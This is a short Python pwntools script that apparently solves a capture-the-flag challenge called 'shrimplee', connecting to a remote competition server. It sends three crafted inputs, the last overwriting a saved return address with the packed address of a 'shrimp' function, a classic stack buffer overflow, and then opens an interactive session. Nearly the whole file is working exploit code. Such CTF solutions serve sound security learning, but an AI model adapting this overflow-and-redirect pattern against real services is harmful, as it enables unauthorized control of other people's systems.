#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./shrimplee")
# context.log_level='debug'
p = remote("chal.competitivecyber.club", 8884)
# p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
# gdbs()
sla(">",b"a"*38+b"a"*4)
sla(">",b"a"*37+b"a"*4)
sla(">",b"a"*38+p64(exe.sym.shrimp+5))






p.interactive()
# good luck pwning :)

